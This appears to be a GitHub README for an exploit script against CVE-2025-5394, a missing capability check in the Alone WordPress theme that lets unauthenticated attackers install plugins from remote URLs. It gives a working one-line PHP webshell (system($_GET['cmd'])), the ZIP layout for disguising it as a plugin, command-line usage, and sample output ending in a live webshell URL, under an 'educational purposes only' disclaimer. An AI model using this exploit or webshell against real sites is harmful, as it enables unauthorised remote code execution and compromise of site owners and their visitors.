# 🚨 CVE-2025-5394 - Unauthenticated Arbitrary Plugin Upload in Alone Theme

## 📌 Affected Product:
**Alone – Charity Multipurpose Non-profit WordPress Theme**  
**Versions:** <= 7.8.3  
**CVE:** CVE-2025-5394  
**CVSS Score:** 9.8 (Critical)

## 🔥 Vulnerability Summary:
The Alone theme for WordPress is vulnerable to **arbitrary file uploads** due to a **missing capability check** on the `alone_import_pack_install_plugin()` function.  
This flaw allows **unauthenticated attackers** to **upload ZIP files** (disguised as plugins) from **remote locations**, potentially achieving **remote code execution**.

---

## ⚙️ Exploit Script (Python)
This repository contains a Python script that **automates the exploitation** of CVE-2025-5394.  
The script triggers the vulnerable AJAX action and uploads a fake plugin (containing a webshell) directly to the WordPress server.

---

## 📁 Webshell Requirements:
The uploaded **ZIP file** must follow this structure:

```
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php
```

Where:
- `shell_plugin` is the plugin directory.
- `shell_plugin.php` is a valid PHP plugin file **with a plugin header**.
- The PHP file can contain a webshell payload.

Example of minimal plugin header inside `shell_plugin.php`:

```php
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
```

---

## 🚀 Example Usage:

```bash
python3 CVE-2025-5394.py -help
```

```
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)
```

---

## ✅ Successful Output:

```bash
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
```

---

## ⚠️ Disclaimer:
This script is provided **for educational and research purposes only**.  
The author is **not responsible** for any misuse or illegal activity conducted using this code.  
Use it **only on systems you own or have explicit permission to test**.

---

## 👨‍💻 By:
**Nxploited ( Khaled Alenazi )**  
GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
